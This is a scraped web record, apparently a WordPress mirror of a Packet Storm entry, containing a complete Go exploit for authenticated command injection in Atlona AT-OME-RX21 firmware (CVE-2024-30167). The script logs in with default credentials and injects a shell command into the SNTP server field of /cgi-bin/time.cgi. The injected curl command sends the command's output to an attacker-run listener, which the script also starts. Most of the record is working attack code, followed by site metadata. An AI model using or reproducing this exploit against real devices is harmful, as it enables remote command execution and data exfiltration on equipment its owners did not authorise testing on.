{“lastseen”:”2026-05-05T21:43:57″,”description”:”Atlona AT-OME-RX21 suffers from an authenticated command injection vulnerability…”,”published”:”2026-05-05T00:00:00″,”modified”:”2026-05-05T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Atlona AT-OME-RX21 Authenticated Command Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:220311″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-30167″],”sourceData”:”\/\/ Exploit Title: Atlona AT-OME-RX21 Authenticated Command Injection\\n \/\/ Google Dork: N\/A\\n \/\/ Date: 2025-12-28\\n \/\/ Exploit Author: RIZZZIOM\\n \/\/ Vendor Homepage: https:\/\/atlona.com\\n \/\/ Software Link: https:\/\/atlona.com\/product\/at-ome-rx21\/\\n \/\/ Version: Firmware \\u003c= 1.5.1\\n \/\/ Tested on: AT-OME-RX21 Embedded Firmware (1.5.0, 1.5.1)\\n \/\/ CVE : CVE-2024-30167\\n \/\/ Usage: go run main.go -t \\u003ctarget_uri\\u003e -u \\u003cusername\\u003e -p \\u003cpassword\\u003e -l \\u003clhost\\u003e -P \\u003clport\\u003e -c \\u003ccommand\\u003e\\n package main\\n \\n import (\\n \\t\\”bytes\\”\\n \\t\\”context\\”\\n \\t\\”encoding\/base64\\”\\n \\t\\”flag\\”\\n \\t\\”fmt\\”\\n \\t\\”io\\”\\n \\t\\”net\/http\\”\\n \\t\\”os\\”\\n \\t\\”os\/signal\\”\\n \\t\\”strings\\”\\n \\t\\”syscall\\”\\n \\t\\”time\\”\\n )\\n \\n func main() {\\n \\tbanner := `\\n \\t\\t \\n \\n \u2584\u2588\u2588\u2588\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588\u2584 \u2584\u2588\u2588\u2584 \u2588\u2588\u2588\u2588\u2584 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588\u2584 \u2584\u2588\u2588\u2584 \u2584\u2588\u2588 \u2584\u2588\u2588\u2580\u2580\u2580 \u2588\u2588\u2588\u2588\u2588\u2588 \\n \u2588\u2588 \u2588\u2588\u2584\u2584\u2588\u2588 \u2588\u2588\u2584\u2584 \u2584\u2584\u2584 \u2584\u2588\u2588\u2580 \u2588\u2588 \u2588\u2588 \u2584\u2588\u2588\u2580 \u2580\u2588\u2588\u2588\u2588\u2588 \u2584\u2584\u2584 \u2584\u2584\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2584\u2584\u2584 \u2584\u2588\u2588\u2580 \\n \u2580\u2588\u2588\u2588\u2588\u2588 \u2580\u2588\u2588\u2580 \u2588\u2588\u2584\u2584\u2584\u2584 \u2588\u2588\u2588\u2584\u2584 \u2580\u2588\u2588\u2580 \u2588\u2588\u2588\u2584\u2584 \u2588\u2588 \u2584\u2584\u2584\u2588\u2580 \u2580\u2588\u2588\u2580 \u2588\u2588 \u2580\u2588\u2584\u2584\u2588\u2580 \u2588\u2588\u2580 \\n \\n \\t\\t\\tPoC by: github.com\/RIZZZIOM\\n \\t`\\n \\tfmt.Println(banner)\\n \\n \\ttarget := flag.String(\\”t\\”, \\”\\”, \\”Target URL (e.g: http:\/\/example.com)\\”)\\n \\tusername := flag.String(\\”u\\”, \\”admin\\”, \\”Username for authentication\\”)\\n \\tpassword := flag.String(\\”p\\”, \\”Atlona\\”, \\”Password for authentication\\”)\\n \\tlport := flag.String(\\”P\\”, \\”4444\\”, \\”listening port for command output\\”)\\n \\tlhost := flag.String(\\”l\\”, \\”\\”, \\”listening host for command output\\”)\\n \\tcommand := flag.String(\\”c\\”, \\”\\”, \\”Command to execute on the target\\”)\\n \\n \\tflag.Parse()\\n \\tif *target == \\”\\” || *lhost == \\”\\” || *command == \\”\\” {\\n \\t\\tfmt.Println(\\”ERROR: Missing required parameters\\”)\\n \\t\\tflag.PrintDefaults()\\n \\t\\tos.Exit(1)\\n \\t}\\n \\n \\turl := strings.TrimRight(*target, \\”\/\\”) + \\”\/cgi-bin\/time.cgi\\”\\n \\tlistener := *lhost + \\”:\\” + *lport\\n \\n \\t\/\/ Buffered channel to prevent goroutine blocking if receiver exits early\\n \\tresponseChan := make(chan struct{}, 1)\\n \\n \\t\/\/ Create context for graceful shutdown coordination\\n \\tctx, cancel := context.WithCancel(context.Background())\\n \\tdefer cancel()\\n \\n \\t\/\/ Start HTTP server and get reference for shutdown\\n \\tserver := httpServe(listener, responseChan, ctx)\\n \\n \\texecuteCommand(url, *username, *password, listener, *command)\\n \\n \\tsigChan := make(chan os.Signal, 1)\\n \\tsignal.Notify(sigChan, syscall.SIGINT, syscall.SIGTERM)\\n \\n \\t\/\/ Timeout to prevent indefinite waiting\\n \\tresponseTimeout := time.NewTimer(30 * time.Second)\\n \\tdefer responseTimeout.Stop()\\n \\n \\tselect {\\n \\tcase \\u003c-responseChan:\\n \\t\\ttime.Sleep(1 * time.Second)\\n \\tcase \\u003c-sigChan:\\n \\t\\tfmt.Printf(\\”\\\\n===Shutting Down===\\\\n\\”)\\n \\tcase \\u003c-responseTimeout.C:\\n \\t\\tfmt.Println(\\”\\\\n===Response Timeout – No response received===\\”)\\n \\t}\\n \\n \\t\/\/ Graceful server shutdown\\n \\tcancel() \/\/ Signal context cancellation\\n \\tshutdownCtx, shutdownCancel := context.WithTimeout(context.Background(), 5*time.Second)\\n \\tdefer shutdownCancel()\\n \\n \\tif err := server.Shutdown(shutdownCtx); err != nil {\\n \\t\\tfmt.Printf(\\”Server shutdown error: %v\\\\n\\”, err)\\n \\t}\\n }\\n \\n func executeCommand(url, username, password, listener, command string) {\\n \\t\/\/ this func sends the commands to the target\\n \\tpayload := fmt.Sprintf(`{\\”syncSntpTime\\”:{\\”serverName\\”:\\”time.google.com; curl -X POST –data \\\\\\”$(%s)\\\\\\” %s\\”}}`, command, listener)\\n \\tauth := base64.StdEncoding.EncodeToString([]byte(username + \\”:\\” + password))\\n \\treq, err := http.NewRequest(\\”POST\\”, url, bytes.NewBuffer([]byte(payload)))\\n \\tif err != nil {\\n \\t\\tpanic(err)\\n \\t}\\n \\treq.Header.Set(\\”User-Agent\\”, \\”Mozilla\/5.0 (Windows NT 10.0) Firefox\/143.0\\”)\\n \\treq.Header.Set(\\”Content-Type\\”, \\”application\/json\\”)\\n \\treq.Header.Set(\\”Authorization\\”, \\”Basic \\”+auth)\\n \\treq.Header.Set(\\”X-Requested-With\\”, \\”XMLHttpRequest\\”)\\n \\n \\tclient := \\u0026http.Client{\\n \\t\\tTimeout: 15 * time.Second,\\n \\t}\\n \\n \\tresp, err := client.Do(req)\\n \\tif err != nil {\\n \\t\\tfmt.Printf(\\”ERROR: Request failed: %v\\\\n\\”, err)\\n \\t\\tos.Exit(1)\\n \\t}\\n \\tdefer resp.Body.Close()\\n \\n \\tswitch resp.StatusCode {\\n \\tcase 200:\\n \\t\\tfmt.Println(\\”Command Injection Successful\\”)\\n \\tcase 401, 403:\\n \\t\\tfmt.Printf(\\”ERROR: Authentication Failed (HTTP %d)\\\\n\\”, resp.StatusCode)\\n \\tcase 404:\\n \\t\\tfmt.Printf(\\”ERROR: Target Endpoint Not Found.\\\\n\\”)\\n \\tdefault:\\n \\t\\tfmt.Printf(\\”ERROR: Unexpected Response (HTTP %d)\\\\n\\”, resp.StatusCode)\\n \\t\\tbody, _ := io.ReadAll(resp.Body)\\n \\t\\tif len(body) \\u003e 0 {\\n \\t\\t\\tfmt.Printf(\\”Response Body: %s\\\\n\\”, string(body))\\n \\t\\t}\\n \\t\\tos.Exit(1)\\n \\t}\\n }\\n \\n func getResponse(r *http.Request, responseChan chan struct{}) {\\n \\t\/\/ this function serves and http server and collects response\\n \\tif r.Method != http.MethodPost {\\n \\t\\tfmt.Printf(\\”Received non-POST Request(%s)\\\\n\\”, r.Method)\\n \\t\\treturn\\n \\t}\\n \\tdefer r.Body.Close()\\n \\tfmt.Println(\\”\\\\n=====Received Response=====\\”)\\n \\n \\tbody, err := io.ReadAll(r.Body)\\n \\tif err != nil {\\n \\t\\tfmt.Printf(\\”Failed To Read Response Body: %v\\\\n\\”, err)\\n \\t\\treturn\\n \\t}\\n \\tfmt.Println(string(body))\\n \\n \\t\/\/ Non-blocking send to prevent goroutine deadlock\\n \\tselect {\\n \\tcase responseChan \\u003c- struct{}{}:\\n \\tdefault:\\n \\t}\\n }\\n \\n func httpServe(listener string, responseChan chan struct{}, ctx context.Context) *http.Server {\\n \\t\/\/ this function gets the command injection response from the custom header\\n \\tmux := http.NewServeMux()\\n \\tmux.HandleFunc(\\”\/\\”, func(w http.ResponseWriter, r *http.Request) {\\n \\t\\tgetResponse(r, responseChan)\\n \\t\\tw.WriteHeader(http.StatusNoContent)\\n \\t})\\n \\n \\tserver := \\u0026http.Server{\\n \\t\\tAddr: listener,\\n \\t\\tHandler: mux,\\n \\t\\tMaxHeaderBytes: 20 * 1024 * 1024,\\n \\t\\tReadTimeout: 30 * time.Second,\\n \\t\\tWriteTimeout: 30 * time.Second,\\n \\t\\tIdleTimeout: 60 * time.Second,\\n \\t}\\n \\n \\tfmt.Printf(\\”Listening on %s for response…\\\\n\\”, listener)\\n \\n \\tgo func() {\\n \\t\\tif err := server.ListenAndServe(); err != nil \\u0026\\u0026 err != http.ErrServerClosed {\\n \\t\\t\\tfmt.Printf(\\”ERROR: Server error: %v\\\\n\\”, err)\\n \\t\\t}\\n \\t}()\\n \\n \\treturn server\\n }”,”sourceHref”:”https:\/\/packetstorm.news\/download\/220311″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/220311\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-05T21:43:57″,”description”:”Atlona AT-OME-RX21 suffers from an authenticated command injection vulnerability…”,”published”:”2026-05-05T00:00:00″,”modified”:”2026-05-05T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Atlona AT-OME-RX21 Authenticated Command Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:220311″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-30167″],”sourceData”:”\/\/ Exploit Title: Atlona AT-OME-RX21 Authenticated Command Injection\\n \/\/ Google Dork: N\/A\\n…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-51606","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n